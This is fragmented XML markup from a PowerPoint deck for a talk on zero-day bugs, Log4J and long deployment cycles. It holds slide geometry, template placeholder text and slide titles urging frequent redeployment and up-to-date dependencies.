                  <a:pt x="56316" y="27785"/>
                  <a:pt x="35187" y="29499"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22546" y="30524"/>
                  <a:pt x="7785" y="36963"/>
                  <a:pt x="2113" y="48306"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-505" y="53541"/>
                  <a:pt x="-290" y="60069"/>
                  <a:pt x="815" y="65816"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3945" y="82096"/>
                  <a:pt x="31257" y="81782"/>
                  <a:pt x="47833" y="82029"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="85779" y="82595"/>
                  <a:pt x="123580" y="68977"/>
                  <a:pt x="161322" y="72949"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="180986" y="75018"/>
                  <a:pt x="206240" y="80754"/>
                  <a:pt x="214824" y="98566"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="218869" y="106960"/>
                  <a:pt x="219605" y="120005"/>
                  <a:pt x="212878" y="126452"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="205283" y="133731"/>
                  <a:pt x="203637" y="131478"/>
                  <a:pt x="194396" y="136504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3" name="Google Shape;93;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4976318" y="1251376"/>
            <a:ext cx="716784" cy="719552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1011450" y="1479050"/>
            <a:ext cx="3301200" cy="23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118" name="Google Shape;118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825" y="1444503"/>
            <a:ext cx="2664900" cy="26649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2671800" y="1881788"/>
            <a:ext cx="3800400" cy="13800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 big impact?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latin typeface="Raleway"/>
                <a:ea typeface="Raleway"/>
                <a:cs typeface="Raleway"/>
                <a:sym typeface="Raleway"/>
              </a:rPr>
              <a:t>USE BIG IMAGE</a:t>
            </a:r>
            <a:endParaRPr b="1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7153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2016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7279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3460029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GRAY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481600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WHITE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5469132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BLACK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3460029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GRAY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481600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WHITE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5469132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BLACK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48764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40" name="Google Shape;140;p23"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="952500" y="1564481"/>
          <a:ext cx="7239000" cy="2004100"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{D6BD4B46-1FE6-4C37-B333-B28726F1F195}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YELLOW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24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16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1964175" y="1749781"/>
            <a:ext cx="693000" cy="312600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20198"/>
              <a:gd name="adj2" fmla="val 724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111111"/>
                </a:solidFill>
                <a:latin typeface="Raleway"/>
                <a:ea typeface="Raleway"/>
                <a:cs typeface="Raleway"/>
                <a:sym typeface="Raleway"/>
              </a:rPr>
              <a:t>OUR OFFICE</a:t>
            </a:r>
            <a:endParaRPr sz="800" b="1">
              <a:solidFill>
                <a:srgbClr val="11111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9" name="Google Shape;149;p24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3947757" y="18640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0" name="Google Shape;150;p24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4688257" y="3998289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1" name="Google Shape;151;p24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6799532" y="23655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2" name="Google Shape;152;p24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7470932" y="40564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3" name="Google Shape;153;p24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2858007" y="37469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4" name="Google Shape;154;p24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1235457" y="20623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430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1708800" y="1583344"/>
            <a:ext cx="5726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89,526,124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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1708800" y="2668610"/>
            <a:ext cx="5726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whoa! that’s a big number,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aren’t you proud?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648000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89,526,124$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1354160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that’s a lot of money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3276902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100%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3983062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total success!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1962451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185,244 users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2668611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and a lot of users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37614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SECOND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12849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FIRST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2379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LAST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2" name="Google Shape;182;p27"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="179" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2906100" y="2623181"/>
            <a:ext cx="85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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="183" name="Google Shape;183;p27"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="181" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5382600" y="2623181"/>
            <a:ext cx="85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789605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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402000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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6014395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789605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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402000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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6014395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6" name="Google Shape;196;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4406424" y="1275975"/>
            <a:ext cx="279407" cy="311099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038649" y="1294939"/>
            <a:ext cx="290572" cy="27318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1813247" y="3082055"/>
            <a:ext cx="309067" cy="301920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4371824" y="3139306"/>
            <a:ext cx="348619" cy="187452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6992685" y="3132721"/>
            <a:ext cx="383419" cy="200614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1760587" y="1282163"/>
            <a:ext cx="398028" cy="298724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insert graphs from Excel or Google Sheets</a:t>
            </a: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25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9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body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1361875" y="671138"/>
            <a:ext cx="31971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mobile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32" name="Google Shape;232;p3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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="233" name="Google Shape;233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34" name="Google Shape;234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8" name="Google Shape;238;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4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rand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588A87"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="BBDBDF"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="7E89A0"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="BEC1D6"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="9B7160"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="D8C0A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2936</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>979</Paragraphs>
  <Slides>118</Slides>
  <Notes>103</Notes>
  <HiddenSlides>39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9" baseType="lpstr">
      <vt:lpstr>Wide Latin</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Homemade Apple</vt:lpstr>
      <vt:lpstr>Impact</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Andale Mono</vt:lpstr>
      <vt:lpstr>Raleway</vt:lpstr>
      <vt:lpstr>Montserrat</vt:lpstr>
      <vt:lpstr>Miranda template</vt:lpstr>
      <vt:lpstr>Zero-day bugs and the risk of a loooong deployment cycle</vt:lpstr>
      <vt:lpstr>github.com/isidore/Talks/blob/master/Zero_day_bugs.md</vt:lpstr>
      <vt:lpstr>Which is safer?</vt:lpstr>
      <vt:lpstr>Which is safer?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Log 4 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 4 J</vt:lpstr>
      <vt:lpstr>Log 4 J</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Thus begins…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</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Minimize Work in Progress  (WIP)</vt:lpstr>
      <vt:lpstr>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Depending on  previous version of anything  is technical debt</vt:lpstr>
      <vt:lpstr>Timeline</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Log 4 J</vt:lpstr>
      <vt:lpstr>Timeline</vt:lpstr>
      <vt:lpstr>You have to be able to re-deploy</vt:lpstr>
      <vt:lpstr>Which is safer?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The longer it’s been since you deployed The larger the liability  to your company</vt:lpstr>
      <vt:lpstr>what should I do? REDEPLOY EVERY MONTH</vt:lpstr>
      <vt:lpstr>How old are your servers? How old are your dependencies?</vt:lpstr>
      <vt:lpstr>github.com/isidore/Talks/blob/master/Zero_day_bugs.md</vt:lpstr>
      <vt:lpstr>Arlo Belshee</vt:lpstr>
      <vt:lpstr>thanks!</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Log 4 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 4 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</vt:lpstr>
      <vt:lpstr>1. TRANSITION HEADLINE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</vt:lpstr>
      <vt:lpstr>use charts to explain your ideas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Zero-day bugs and the risk of a loooong deployment cycle</dc:title>
  <cp:lastModifiedBy>Llewellyn Falco</cp:lastModifiedBy>
  <cp:revision>27</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-19T00:08:28Z</dcterms:modified>
</cp:coreProperties>
</file>